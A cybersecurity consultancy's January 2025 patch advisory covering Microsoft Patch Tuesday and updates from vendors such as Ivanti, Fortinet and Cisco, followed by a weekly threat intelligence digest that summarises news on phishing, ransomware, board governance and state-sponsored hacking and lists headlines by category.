Updated

Since writing further updates have been released for another Ivanti vulnerability, this time affecting Endpoint Manager, as well as updates for Google Chrome, to address 132 fixes and 16 unique security issues, and Zoom to address a number of security issues across Windows, Mac and Linux clients.

See more details on each of those in the relevant sections below

Executive Summary

Microsoft’s Patch Tuesday for January 2025 started the year with security updates for 159 flaws, including eight zero-day vulnerabilities, with three actively exploited in attacks. This Patch Tuesday also included fixes for twelve critical vulnerabilities, including information disclosure, privileges elevation, and remote code execution flaws.

Several other major software and hardware vendors released critical security updates this month to address vulnerabilities that could be exploited by attackers. Adobe issued updates for popular products such as Photoshop, Illustrator for iPad, and Animate, while Cisco addressed issues across multiple tools, including ThousandEyes and Crosswork Network Controller. Ivanti and Fortinet tackled zero-day vulnerabilities actively exploited in attacks, with Ivanti focusing on Connect Secure and Fortinet on its FortiOS and FortiProxy platforms.

What’s the risk to me or my business?

The actively exploited vulnerabilities could allow an attacker to compromise the confidentiality, integrity and availability of the affected applications and the organisations data on the affected systems.

What can I do?

Black Arrow recommends applying the available security updates for all supported versions of products that have been impacted by the various vulnerabilities. The updates should be applied as soon as possible for actively exploited vulnerabilities and all other vulnerabilities that have a critical or high severity ratings.

Microsoft

Further details on specific updates within this Microsoft patch Tuesday can be found here:

https://msrc.microsoft.com/update-guide/releaseNote/2025-Jan

Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall & Zyxel - updated to include Google Chrome and Zoom

Further details of the vulnerabilities in affected Adobe, Cisco, Ivanti, Fortinet, GitHub, SAP, SonicWall and Zyxel products can be found here:

https://helpx.adobe.com/security/security-bulletin.html

https://sec.cloudapps.cisco.com/security/center/publicationListing.x

https://www.ivanti.com/blog/january-security-update

https://community.fortinet.com/t5/FortiGate/Technical-Tip-Upgrade-to-FortiOS-7-0-17-to-resolve-vulnerability/ta-p/370334

https://github.blog/open-source/git/git-security-vulnerabilities-announced-5/

https://support.sap.com/en/my-support/knowledge-base/security-notes-news/january-2025.html

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0003

https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-improper-privilege-management-vulnerability-in-aps-and-security-router-devices-01-14-2025

https://chromereleases.googleblog.com/2025/01/stable-channel-update-for-desktop_14.html

https://www.zoom.com/en/trust/security-bulletin/?cms_guid=false&lang=en-US

#threatadvisory #threatintelligence #cybersecurity

Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.

Exec Summary

Cyber security remains a critical priority for organisations in 2025, with evolving threats demanding stronger leadership, governance, and proactive resilience measures. Phishing click rates surged by 190% in 2024, with cloud applications as primary targets and a shift in attack vectors from email to search engines and malicious ads. Meanwhile, ransomware inflicted $133.5 million in payouts, and insider threats posed complex risks, exacerbated by generative AI-enabled scams. Addressing these challenges requires a combination of advanced defences like zero trust architectures, improved governance frameworks, and clarity in communication to bridge knowledge gaps at the board level.

Governance is under heightened scrutiny as systemic risks grow. Only 26% of Europe’s top companies earned high ratings for cyber security resilience, while regulatory pressures, such as the EU’s DORA, underline the urgency for improved third-party risk management and operational resilience. Boards must prioritise expertise, particularly in AI, as gaps persist despite incremental progress. Leaders should integrate risk management across infrastructures to address geopolitical cyber warfare threats, emphasising supply chain security and AI-driven defences.

To sustain resilience, organisations must embed adaptability, automate responses, and foster cross-departmental collaboration. Strategic investments in skilled talent, incident readiness, and emerging technologies will help to ensure businesses not only survive but thrive amidst escalating cyber threats.

Top Cyber Stories of the Last Week

Phishing Click Rates Triple in 2024

Phishing click rates surged by 190% in 2024, with over eight in 1,000 users clicking phishing links monthly, according to Netskope. Cloud applications were the top targets (27%), primarily aiming to compromise accounts for illicit resale, of which Microsoft was the most targeted brand (42% of clicks), followed by banking (17%) and telco (13%) sectors. A shift was noted in phishing link locations from email-based attacks to search engines using SEO poisoning and malicious ads. Meanwhile, workplace adoption of GenAI apps rose to 94%, with organisations implementing controls such as app blocking (73%) and data loss prevention (45%).

What Boards Need to Know on Digital and Cyber Security Governance In 2025

In 2025, boardroom oversight of digital and cyber security will face increased scrutiny and expectations as systemic risks continue to grow. In 2024, cyber incidents cost UnitedHealth Group $2.5 billion and drove a 40% stock price drop at Crowdstrike, underlining the escalating consequences of poor governance. While 25% of S&P 500 directors now have cyber security expertise, up from 12% in 2020, gaps remain: 79% of boards report limited or no AI experience. Regulatory pressure, such as the European Central Bank (ECB) mandatory cyber expertise for bank boards, and frameworks like NIST CSF 2.0, signal the shift towards systemic reforms in boardroom governance.

Only 26% of Europe’s Top Companies Earn a High Rating for Cyber Security

A report by SecurityScorecard reveals that only 26% of Europe’s top 100 companies earn an A rating for cyber security resilience, with organisations rated A being 13.8 times less likely to experience a breach than those rated F. 98% of European companies faced third-party breaches in the past year, and 18% reported direct breaches, exposing gaps in internal defences. The energy sector lags significantly, with 75% of companies rated C or lower, while Scandinavian firms lead with only 20% scoring below B. As the EU’s DORA deadline looms, prioritising third-party risk management is critical for strengthening operational resilience.

Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape

Organisations must now recognise that breaches are highly prevalent in today’s threat landscape, driven by increasingly sophisticated cyber attacks. Traditional perimeter-based defences, while essential, are no longer sufficient on their own. To mitigate the impact of inevitable breaches, adopting a zero trust approach and embedding microsegmentation can limit attackers’ movement within a network, reducing harm and operational disruption. While implementing such strategies demands cross-departmental collaboration and mindset shifts, gradual adoption can ease operational impacts. By becoming ‘breach ready’, organisations can maintain resilience, protect their reputation, and safeguard business continuity even in the face of persistent threats.

Ransomware Shock: $133 Million Paid, 195 Million Records Compromised

Ransomware continues to pose a significant threat to organisations globally, with a 2024 report revealing over 1,200 confirmed attacks and more than 195 million records compromised. Ransom payments reached $133.5 million, with an average payout of $9.5 million. Key sectors affected include business, healthcare, and government, while education saw a slight decline in incidents. Despite early signs of decreasing activity, ransomware attacks surged towards the end of the year, and experts warn of continued large-scale disruptions and data breaches in 2025. The lack of mandatory reporting in many regions further obscures the true scale of the threat.

Operational Incident Reporting: UK Financial Regulators Propose New Rules

UK financial regulators, including the FCA and PRA, are consulting on new operational incident reporting rules to strengthen operational resilience across the financial sector. The proposals aim to clarify when and how firms must report incidents such as IT outages or cyber attacks, focusing on consumer harm, market integrity, and safety risks. Firms would need to submit initial, intermediate, and final reports for each incident. Additionally, material third-party arrangements would require annual updates. These changes align with international standards like the EU’s DORA, and regulators may pursue enforcement for non-compliance. The consultation closes in March 2025.

Insider Threat: Tackling the Complex Challenges of the Enemy Within

Insider threats represent a growing challenge for organisations, with risks ranging from financial fraud and intellectual property theft to national security breaches. High-profile cases demonstrate how malicious insiders, such as bribed employees or malcontent staff, exploit weak detection systems. Sophisticated hiring scams, including the use of false identities, are increasingly enabled by generative AI. Prevention efforts include robust background checks, network anomaly detection, and sentiment analysis, but these methods are not foolproof. As technology evolves, organisations must balance effective detection with legal and ethical considerations to mitigate these complex and evolving risks.

The Big Question: Are Businesses Now in the Front Line for Cyber Warfare?

Recent reports highlight a growing shift towards cyber warfare, with businesses increasingly on the frontline of nation-state cyber attacks. The evolving threat landscape is driven by geopolitical tensions, with critical infrastructure, supply chains, and even civilian services becoming primary targets. Experts warn of a rise in AI-driven cyber weapons capable of bypassing defences and amplifying the scale of attacks. Organisations face heightened risks as ransomware evolves into a political weapon and the proliferation of IoT devices creates new vulnerabilities. A unified approach to security, integrating risk management across infrastructures, is essential to address the escalating threats in 2025.

How Cyber Security Jargon Creates Barriers and Wastes Resources

The cyber security industry, growing at 20% year-on-year, faces a critical communication challenge. Over-reliance on jargon and acronyms hinders understanding and creates barriers, particularly at the board level. Complex terms often obscure what tools do, limiting funding and leaving organisations vulnerable to cyber attacks. A shift toward clear, actionable language, focusing on securing source code, runtime applications, cloud environments, and supply chains, can break down silos and improve integration into development processes. By fostering clarity and inclusivity, organisations can better align security strategies with business priorities, ensuring both protection and efficiency.

Scammers Exploit Microsoft 365 to Target PayPal Users

Fortinet has identified a phishing attack exploiting PayPal's money request feature, leveraging Microsoft 365's Sender Rewrite Scheme (SRS) to bypass email authentication and deceive recipients. The scam involves legitimate-looking payment requests, making them hard to distinguish from genuine communications. Victims who follow the provided link risk granting scammers access to their PayPal accounts. Fortinet highlights the importance of employee education, robust data loss prevention (DLP) rules, and advanced AI-driven detection tools to identify unusual patterns, such as group messaging anomalies, and mitigate these increasingly sophisticated threats. Organisations must prioritise vigilance and proactive defences to combat such risks.

Five Ways to Make Cyber Security Resilience More Than Just a Buzzword

Organisations must shift from reactive approaches to a sustainable cyber security strategy to build true resilience. This means not just addressing immediate threats but embedding adaptability into core systems, enabling defences to evolve with emerging risks. Key measures include automating responses for agility, implementing zero trust architectures, and continuously improving through learning and self-healing mechanisms. By prioritising proactive preparation and fostering a culture of shared responsibility, businesses can move beyond survival to thrive amidst uncertainty, ensuring their defences are robust, adaptable, and future proof.

Meet the Chinese ‘Typhoon’ Hackers Preparing for War

Chinese state-sponsored hacking groups, labelled collectively as the "Typhoon" family, have emerged as a significant cyber security threat to the West, targeting critical infrastructure sectors like water, energy, and transportation. These groups, including Volt Typhoon, Flax Typhoon, and Salt Typhoon, have engaged in deep infiltration to prepare for potential disruptive cyber attacks. Notable incidents include the dismantling of botnets used to mask malicious activities, with over 100 intrusions identified by early 2025. Recent breaches by Salt Typhoon targeted telecoms, exposing sensitive communications data, including law enforcement surveillance systems, underscoring the escalating strategic risks posed by these operations.

The Cyber Security Priorities For 2025: What Leaders Should Focus On

A recent analysis highlights the evolving cyber security priorities for 2025, emphasising the critical role of leadership in driving resilience. As cyber threats become increasingly sophisticated, AI-driven attacks and supply chain vulnerabilities are top concerns, alongside stricter data privacy regulations. Leaders are encouraged to adopt zero trust principles, invest in skilled talent, and align security strategies with business objectives. Preparing for quantum computing’s impact on encryption is also vital. Practical steps include regular incident response testing, vendor risk assessments, and fostering a security-first culture. Effective leadership can turn robust cyber security into a competitive advantage.

Sources:

https://www.infosecurity-magazine.com/news/phishing-click-rates-triple/

https://www.forbes.com/sites/bobzukis/2025/01/09/what-boards-need-to-know-on-digital-and-cybersecurity-governance-in-2025/

https://www.helpnetsecurity.com/2025/01/06/european-companies-cybersecurity-rating/

https://securityboulevard.com/2025/01/breach-readiness-elevating-your-security-posture-in-a-constantly-evolving-threat-landscape/

https://www.forbes.com/sites/daveywinder/2025/01/09/ransomware-shock-133-million-paid-195-million-records-compromised/

https://www.jdsupra.com/legalnews/operational-incident-reporting-uk-2347989/

https://www.securityweek.com/insider-threat-tackling-the-complex-challenges-of-the-enemy-within/

https://www.emergingrisks.co.uk/the-big-question-are-businesses-now-in-the-front-line-for-cyberwarfare/

https://www.techradar.com/pro/how-cybersecurity-jargon-creates-barriers-and-wastes-resources

https://www.infosecurity-magazine.com/news/scammers-exploit-microsoft365/

https://www.scworld.com/perspective/five-ways-to-make-cybersecurity-resilience-more-than-just-a-buzzword

https://techcrunch.com/2025/01/06/meet-the-chinese-typhoon-hackers-preparing-for-war/

https://www.forbes.com/sites/andrewhayeurope/2025/01/06/the-cybersecurity-priorities-for-2025-what-leaders-should-focus-on/  

Governance, Risk and Compliance

Report: AI and security governance remain top priorities for 2025 - SD Times

Rethinking Incident Response: How Organizations Can Avoid Budget Overruns and Delays  - Security Boulevard

Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape  - Security Boulevard

What Boards Need To Know On Digital And Cyber Security Governance In 2025

The true cost of a security breach | TechRadar

So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online

Poor Cyber Hygiene can Cost Organizations up to an Average of $677 Million  - Security Boulevard

Operational Incident Reporting: UK Financial Regulators Propose New Rules | A&O Shearman - JDSupra

Personal liability sours 70% of CISOs on their role | CSO Online

The Cyber Security Priorities For 2025: What Leaders Should Focus On

How CISOs can forge the best relationships for cybersecurity investment | CSO Online

The Cybersecurity Wake-Up Call for MSMEs in 2025 | Entrepreneur

Top 9 Cyber Loss Scenarios: A Year In Review, 2024 | Kovrr - Security Boulevard

How cyber security jargon creates barriers and wastes resources | TechRadar

Executive Leadership Under Siege: Cyber Security Predictions for 2025

Five ways to make cybersecurity resilience more than just a buzzword | SC Media

Brace yourself for cyber attacks | Professional Security Magazine

Top Cyber Threats To Watch Out For In 2025

Threats

Ransomware, Extortion and Destructive Attacks

Ransomware Shock—$133 Million Paid, 195 Million Records Compromised

Ransomware attacks against critical infrastructure exceed 2K in a decade | SC Media

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Important Preventative Strategies For Avoiding And Recovering From Ransomware Threats

Space Bears Ransomware: What You Need To Know | Tripwire

Ransomware attacks on education declined in 2024, report shows | StateScoop

How to Protect Against Ransomware: Everything You Need to Know

Ransomware Victims

New York Hospital Says Ransomware Attack Data Breach Impacts 670,000 - SecurityWeek

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

PowerSchool Reportedly Pays Ransom to Prevent Student Data Leak - Infosecurity Magazine

IT Giant Atos Responds to Ransomware Group's Data Theft Claims - SecurityWeek

Hackers release files stolen in cyberattack on Rhode Island benefits system | StateScoop

Dental Practice Pays State in Alleged Data Breach 'Cover Up'

American Addiction Centers Hit with PHI Breach Class Action | Robinson+Cole Data Privacy + Security Insider - JDSupra

Almost 8500 People Affected By Casio Data Leak

Ransomware Targeting Infrastructure Hits Telecom Namibia

Phishing & Email Based Attacks

Phishing Click Rates Triple in 2024 - Infosecurity Magazine

The top target for phishing campaigns - Help Net Security

iPhones more affected than Android smartphones by a certain kind of cyber attack - NotebookCheck.net News

Meet PhishWP – The New WordPress Plugin That’s Turning Legit Sites into Phishing Traps - Security Boulevard

Russian hackers turn trusted online stores into phishing pages | CSO Online

Fortinet warns of sophisticated phishing campaign exploiting Microsoft 365 domains - SiliconANGLE

Scammers Exploit Microsoft 365 to Target PayPal Users - Infosecurity Magazine

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

How to protect yourself from phishing attacks in Chrome and Firefox | ZDNET

Other Social Engineering

Fake Government Officials Use Remote Access Tools for Card Fraud - Infosecurity Magazine

Artificial Intelligence

Report: AI and security governance remain top priorities for 2025 - SD Times

Google Chrome AI extensions deliver info-stealing malware in broad attack | Malwarebytes

Cloud, AI, and cybersecurity converge on fintech landscape | SC Media

A NATO-backed startup says agentic malware could be here as soon as 2027

New AI Challenges Will Test CISOs & Their Teams in 2025

UK Government to Ban Creation of Explicit Deepfakes - Infosecurity Magazine

Deepfake advancements pose growing cyber security risks

How will the evolution of AI change its security? | TechRadar

Trolley Problem, Safety Versus Security of Generative AI - SecurityWeek

Why an “all gas, no brakes” approach for AI use won't work - Help Net Security

Innovation, Automation, And The Cyber Security Challenges Ahead

Malware

Google Chrome AI extensions deliver info-stealing malware in broad attack | Malwarebytes

A NATO-backed startup says agentic malware could be here as soon as 2027

Over 4,000 backdoors hijacked by registering expired domains

New Banshee Malware Targeting MacOS Users Remained Undetected For Months

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

PLAYFULGHOST Delivered via Phishing and SEO Poisoning in Trojanized VPN Apps

A Windows filetype update may have complicated cyber threat detection efforts | TechRadar

New Infostealer Campaign Uses Discord Videogame Lure - Infosecurity Magazine

Wallet Drainer Malware Used to Steal $500 Million in Cryptocurrency in 2024 - SecurityWeek

When Is A RAT, Not A RAT?

Researchers Expose NonEuclid RAT Using UAC Bypass and AMSI Evasion Techniques

Google warns of legit VPN apps being used to infect devices with malware | TechRadar

Top 5 Malware Threats to Prepare Against in 2025

Fake Government Officials Use Remote Access Tools for Card Fraud - Infosecurity Magazine

Advanced evasion techniques leveraged by novel NonEuclid RAT | SC Media

Bots/Botnets

US Sanctions Chinese Cybersecurity Firm for Global Botnet Attacks - Infosecurity Magazine

New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices - Infosecurity Magazine

Gayfemboy Botnet targets Four-Faith router vulnerability

Mobile

FireScam Malware Campaign Highlights Rising Threat To Mobile Users

iPhones more affected than Android smartphones by a certain kind of cyberattack - NotebookCheck.net News

Candy Crush, Tinder, MyFitnessPal: See the Thousands of Apps Hijacked to Spy on Your Location

Millions of Vinted, Spotify and Tinder users' data could be compromised in global hack

Porn Ban—New Threat For iPhone, iPad, Android Users

Data Privacy: Your Carrier Knows a Lot About You. Here's How to Take Back Control - CNET

Android patches several vulnerabilities in first security update of 2025 | CyberScoop

This iOS 18 feature shares your photos with Apple for analysis. Should you be worried? | ZDNET

Android Under Attack—Users Warned As FireScam Threat Evades Detection

Apple rolls out mystery update with 'important bug fixes' for iPhones and iPads | ZDNET

First Android Update of 2025 Patches Critical Code Execution Vulnerabilities - SecurityWeek

Denial of Service/DoS/DDoS

Japanese Businesses Hit By a Surge In DDoS Attacks

Internet of Things – IoT

IoT's Regulatory Reckoning Is Overdue

Buying a smart home device? Look for this new cybersecurity seal - here's why | ZDNET

White House launches cybersecurity label program for consumers | CyberScoop

New Mirai Botnet Exploits Zero-Days in Routers and Smart Devices - Infosecurity Magazine

Gayfemboy Botnet targets Four-Faith router vulnerability

How vulnerable Ecovacs robot vacuums are being hacked | Kaspersky official blog

Tesla data helped police in Las Vegas. It highlights privacy concerns | AP News

Data Breaches/Leaks

Candy Crush, Tinder, MyFitnessPal: See the Thousands of Apps Hijacked to Spy on Your Location

Millions of Vinted, Spotify and Tinder users' data could be compromised in global hack

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

PowerSchool Reportedly Pays Ransom to Prevent Student Data Leak - Infosecurity Magazine

The real cost of data breaches for businesses - Help Net Security

CISA says Treasury was the only US agency breached via BeyondTrust - Help Net Security

UN's aviation agency confirms attack on recruitment database • The Register

Largest US addiction treatment provider notifies patients of data breach

How to empower employees to prevent data leaks | Professional Security Magazine

Washington Attorney General Sues T-Mobile Over 2021 Data Breach - SecurityWeek

Dental group lied through teeth about data breach, fined $350,000 | Malwarebytes

UN aviation agency 'actively investigating' cyber criminal’s claimed data breach | The Record from Recorded Future News

Hackers Claim Massive Breach of Location Data Giant, Threaten to Leak Data

American Addiction Centers Hit with PHI Breach Class Action | Robinson+Cole Data Privacy + Security Insider - JDSupra

Medical billing firm Medusind discloses breach affecting 360,000 people

Excelsior Orthopaedics Data Breach Impacts 357,000 People - SecurityWeek

Mortgage Cos. Fined $20M Over Cybersecurity Breach - Law360

Almost 8500 People Affected By Casio Data Leak

Organised Crime & Criminal Actors

Malicious hackers have their own shadow IT problem | CyberScoop

Web3 Attacks Result in $2.3Bn in Cryptocurrency Losses - Infosecurity Magazine

Torturing hackers in prison: surviving as an act of protest | Cybernews

CISOs’ Top Cyber Security Threats 2025: Scattered Spider, Deepfakes, and More - Security Boulevard

Cyber Criminals Don't Care About National Cyber Policy

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain

Cryptocurrency wallet drainers stole $494 million in 2024

Wallet Drainer Malware Used to Steal $500 Million in Cryptocurrency in 2024 - SecurityWeek

Insider Risk and Insider Threats

Insider Threat: Tackling the Complex Challenges of the Enemy Within - SecurityWeek

83% of organizations reported insider attacks in 2024

Internal threats in the cloud | Professional Security Magazine

How to empower employees to prevent data leaks | Professional Security Magazine

How can organizations mitigate the security risks caused by human error?

Supply Chain and Third Parties

Widespread cyberattack targets Google Chrome extensions, compromises 2.6 million devices | TechSpot

Chrome Compromises Highlight Software Supply Challenges

OpenAI Blames Cloud Provider For ChatGPT Outage

Atos confirms third-party breach but rejects direct Space Bears compromise | SC Media

CISA says Treasury was the only US agency breached via BeyondTrust - Help Net Security

Cloud/SaaS

Cloud, AI, and cyber security converge on fintech landscape | SC Media

Internal threats in the cloud | Professional Security Magazine

OpenAI Blames Cloud Provider For ChatGPT Outage

From $22M in Ransom to +100M Stolen Records: 2025's All-Star SaaS Threat Actors to Watch

Fortinet warns of sophisticated phishing campaign exploiting Microsoft 365 domains - SiliconANGLE

Scammers Exploit Microsoft 365 to Target PayPal Users - Infosecurity Magazine

MSSPs Have a Role in Stopping Cloud Attacks Using Stolen Credentials | MSSP Alert

Unconventional Cyber Attacks Aim for PayPal Account Takeover

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Outages

OpenAI Blames Cloud Provider For ChatGPT Outage

Proton Mail still down as Proton recovers from worldwide outage

CrowdStrike bounces back after triggering largest IT outage in history

Identity and Access Management

Identity Security to Become a Focus in 2025, Experts Say | MSSP Alert

The Benefits of Implementing Least Privilege Access - Security Boulevard

Encryption

Around 3.3M POP3 and IMAP mail servers lack TLS encryption

Millions of email users at risk — passwords could be exposed to hackers, experts warn | Tom's Guide

Making the most of cryptography, now and in the future - Help Net Security

How to password protect a USB stick in less than 5 minutes - Which? News

Encryption backdoor debate 'done and dusted' • The Register

Mixed Messages: The Salt Typhoon Encryption Debacle | Benesch - JDSupra

How to encrypt any email - in Outlook, Gmail, and other popular services | ZDNET

Linux and Open Source

Open source worldwide: Critical maintenance gaps exposed - Help Net Security

Passwords, Credential Stuffing & Brute Force Attacks

Router reality check: 86% of default passwords have never been changed

MSSPs Have a Role in Stopping Cloud Attacks Using Stolen Credentials | MSSP Alert

Almost half Gen Z and Millennials have had their social media passwords hacked

Critical ‘Rising Risk’ Attack Alert—Change Your Router Password Now

Social Media

Meta ditches fact checking for community notes - just like on X | ZDNET

TikTok Ban Thrusts Apple (AAPL), Google Into US-China Geopolitical Fray - Bloomberg

E.U. Commission Fined for Transferring User Data to Meta in Violation of Privacy Laws

Almost half Gen Z and Millennials have had their social media passwords hacked

New Infostealer Campaign Uses Discord Videogame Lure - Infosecurity Magazine

Mark Zuckerberg Says Meta Fact-Checkers Were the Problem. Fact-Checkers Rule That False. - The New York Times

UK universities join retreat from Elon Musk's X, citing misinformation on platform | Reuters

EU Commission urged to act over Elon Musk’s ‘interference’ in elections | European Union | The Guardian

Meta exempted top advertisers from standard content moderation process

Meta Now Lets Users Say Gay and Trans People Have ‘Mental Illness’ | WIRED

Training, Education and Awareness

How to empower employees to prevent data leaks | Professional Security Magazine

8 Tips for Fortifying Your Cyber Defenses With a Human Firewall

Regulations, Fines and Legislation

New HIPAA Security Rules Pull No Punches

Cyber security law updates in the UK and the EU | Technology Law Dispatch

Operational Incident Reporting: UK Financial Regulators Propose New Rules | A&O Shearman - JDSupra

IoT's Regulatory Reckoning Is Overdue

Proposed Updates to HIPAA Security Rule Would Require Entities to Adopt Enhanced Cybersecurity Measures | Fisher Phillips - JDSupra

White House launches cyber security label program for consumers | CyberScoop

UK Government to Ban Creation of Explicit Deepfakes - Infosecurity Magazine

A Year in Privacy and Security: Privacy Violations, Large-Scale Data Breaches, and Big Fines and Settlements | Robinson+Cole Data Privacy + Security Insider - JDSupra

Cyber criminals Don't Care About National Cyber Policy

Dental group lied through teeth about data breach, fined $350,000 | Malwarebytes

Dental Practice Pays State in Alleged Data Breach 'Cover Up'

Mortgage Cos. Fined $20M Over Cyber Security Breach - Law360

US has ‘a lot of work to do’ on network defences, departing cyber czar says - Defense One

Models, Frameworks and Standards

New HIPAA Security Rules Pull No Punches

Proposed Updates to HIPAA Security Rule Would Require Entities to Adopt Enhanced Cybersecurity Measures | Fisher Phillips - JDSupra

E.U. Commission Fined for Transferring User Data to Meta in Violation of Privacy Laws

The ongoing evolution of the CIS Critical Security Controls - Help Net Security

The NIS2 Directive in Germany: Looking Ahead | Hogan Lovells - JDSupra

Data Protection

Huge Changes Predicted For The Data Privacy Landscape

Careers, Working in Cyber and Information Security

It’s Time Businesses Address The UK’s Cybersecurity Talent Shortage

Helping Veterans Transition to Civilian Life: How Employers Can Tap into the Cybersecurity Talent Pool - ClearanceJobs

Law Enforcement Action and Take Downs

Sharing of Telegram User Data Surged After CEO Arrest

Hacker Sentenced After Stealing Unreleased Coldplay Tracks

Misinformation, Disinformation and Propaganda

Meta ditches fact checking for community notes - just like on X | ZDNET

Mark Zuckerberg Says Meta Fact-Checkers Were the Problem. Fact-Checkers Rule That False. - The New York Times

UK universities join retreat from Elon Musk's X, citing misinformation on platform | Reuters

EU Commission urged to act over Elon Musk’s ‘interference’ in elections | European Union | The Guardian

Meta exempted top advertisers from standard content moderation process

Meta Now Lets Users Say Gay and Trans People Have ‘Mental Illness’ | WIRED

Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity

Cyber Warfare and Cyber Espionage

Historical Warfare’s Parallels with Cyber Warfare - Australian Cyber Security Magazine

Preparing for Cybergeddon - defenceWeb

The Big Question: Are businesses now in the front line for cyberwarfare? - Emerging Risks Media Ltd

Shadows Of Power: Navigating The Complexities Of Global Security – Analysis – Eurasia Review

Nation State Actors

China

Meet the Chinese 'Typhoon' hackers preparing for war | TechCrunch

How Chinese Hackers Graduated From Clumsy Corporate Thieves to Military Weapons - WSJ

China cyber threats: What businesses can do to protect themselves | ITPro

Chinese hackers ran amok in US telecom network for 18 months -- got info on over 1 million people: report

China Protests US Sanctions for Its Alleged Role in Hacking, Complains of Foreign Hacker Attacks - SecurityWeek

UK cyber experts on red alert after Salt Typhoon attacks on US telcos | ITPro

China’s escalating cyber attacks highlight Biden, Trump differences - Defense One

Hackers Terrify US Intelligence After Infiltrating Guam - Bloomberg

After China's Salt Typhoon, the reconstruction starts now • The Register

U.S. uncovers hacking campaign targeting Guam's critical infrastructure — suspected Chinese Volt Typhoon hacks could disrupt the defense of Taiwan | Tom's Hardware

FCC chief urges auction to fund 'Rip and Replace' program • The Register

Japanese police claim China ran five-year cyberattack • The Register

Mandiant links Ivanti zero-day exploitation to Chinese hackers | TechTarget

46 Japanese entities hit by cyberattacks since year-end - Japan Today

US-China: A Cyberwar With Internet Agents – OpEd – Eurasia Review

Taiwan claims China-linked ship damaged submarine cable • The Register

Taiwan raises alarm over increasing Chinese cyberattacks | Taiwan News | Jan. 5, 2025 15:31

TikTok Ban Thrusts Apple (AAPL), Google Into US-China Geopolitical Fray - Bloomberg

Mixed Messages: The Salt Typhoon Encryption Debacle | Benesch - JDSupra

China hits Lockheed Martin, Raytheon and Boeing with export ban after US arms sales to Taiwan | The Independent

The US just added Tencent — which backs US startups — to its list of 'Chinese military' companies | TechCrunch

Chinese APT Exploits Versa Networks Zero-Day Flaw | Decipher

Russia

WordPress phishing plugin drives online shopping fraud | SC Media

Russian hackers turn trusted online stores into phishing pages | CSO Online

Banshee: The Stealer That "Stole Code" From MacOS XProtect - Check Point Research

Cyber attacks on Ukraine in 2024: a 70% increase

Russian internet provider confirms its network was ‘destroyed’ following attack claimed by Ukrainian hackers | The Record from Recorded Future News

'Russia's Google' Yandex ordered to hide maps of oil refineries after Ukrainian attacks

Hackers claim to have breached Russia’s real estate database, Moscow denies

Ukrainian hackers take credit for hacking Russian ISP that wiped out servers and caused internet outages | TechCrunch

Tools and Controls

Rethinking Incident Response: How Organizations Can Avoid Budget Overruns and Delays  - Security Boulevard

Breach Readiness: Elevating Your Security Posture in a Constantly Evolving Threat Landscape  - Security Boulevard

Why Small Business Can't Rely Solely on AI to Combat Threats

Around 3.3M POP3 and IMAP mail servers lack TLS encryption

Confidently Secure: Leveraging PAM for Enhanced Protections - Security Boulevard

How to empower employees to prevent data leaks | Professional Security Magazine

Neglected Domains Used in Malspam to Evade SPF and DMARC Security Protections

90 Percent of Business Leaders Lack Faith in AI-driven Cyber Security Solutions, Arelion Report Reveals

Identity Security to Become a Focus in 2025, Experts Say | MSSP Alert

From Silos to Synergy: Transforming Threat Intelligence Sharing in 2025 - SecurityWeek

Top 6 Ways To Back Your Business Up With Cyber Threat Intelligence

Innovation, Automation, And The Cyber Security Challenges Ahead

The Benefits of Implementing Least Privilege Access - Security Boulevard

Cybersecurity in 2025: Agentic AI to change enterprise security and business operations in year ahead | SC Media

Best of 2024: If You are Reachable, You Are Breachable, and Firewalls & VPNs are the Front Door  - Security Boulevard

Google warns of legit VPN apps being used to infect devices with malware | TechRadar

Why Traditional Fraud Scores Are No Longer Enough for Modern Threats - Security Boulevard

8 Tips for Fortifying Your Cyber Defenses With a Human Firewall

How CISOs can make smarter risk decisions - Help Net Security

Other News

Only 26% of Europe's top companies earn a high rating for cybersecurity - Help Net Security

UK Internet Domain Registry Nominet Suffers Cyber Attack - ISPreview UK

‘You can no longer fully trust your onboard systems.’ Pilots say airline hacking attacks now a daily problem – The Irish Times

The Cyber Security Wake-Up Call for MSMEs in 2025 | Entrepreneur

UK Invests £1.9M in Cyber Resilience Projects to Boost Skills and Protect Economy | Public Sector News

Magecart Attacks Surge as E-Commerce Security Struggles to Keep Pace - Security Boulevard

Cyber security deserves a place in the political spotlight | SC Media

Cyber resiliency should be top priority for investors | News | IPE

7 Lessons From A Year Of Unprecedented Cyber Attacks

2024 was worst year on record for commercial cyber attacks | Total Telecom

Rethinking cyber security in government: Prioritizing recovery and resilience | FedScoop

So, you don’t have a chief information security officer? 9 signs your company needs one | CSO Online

Vulnerability Management

Millions of Windows 10 PCs face security disaster as Microsoft ends support

Key Cyber Initiatives from CISA: KEV Catalog, CPGs, and PRNI | CISA

Vulnerabilities

Security pros baited by fake Windows LDAP exploits • The Register

Thousands of Buggy BeyondTrust Systems Remain Exposed

Tenable Disables Nessus Agents Over Faulty Updates - SecurityWeek

Mandiant links Ivanti zero-day exploitation to Chinese hackers | TechTarget

Android patches several vulnerabilities in first security update of 2025 | CyberScoop

Mitel MiCollab, Oracle WebLogic Server vulnerabilities exploited by attackers - Help Net Security

Chrome 131, Firefox 134 Updates Patch High-Severity Vulnerabilities - SecurityWeek

Surprise Google Chrome 131 Update For Windows, Mac, Linux, Android

Hackers are exploiting a new Ivanti VPN security bug to hack into company networks | TechCrunch

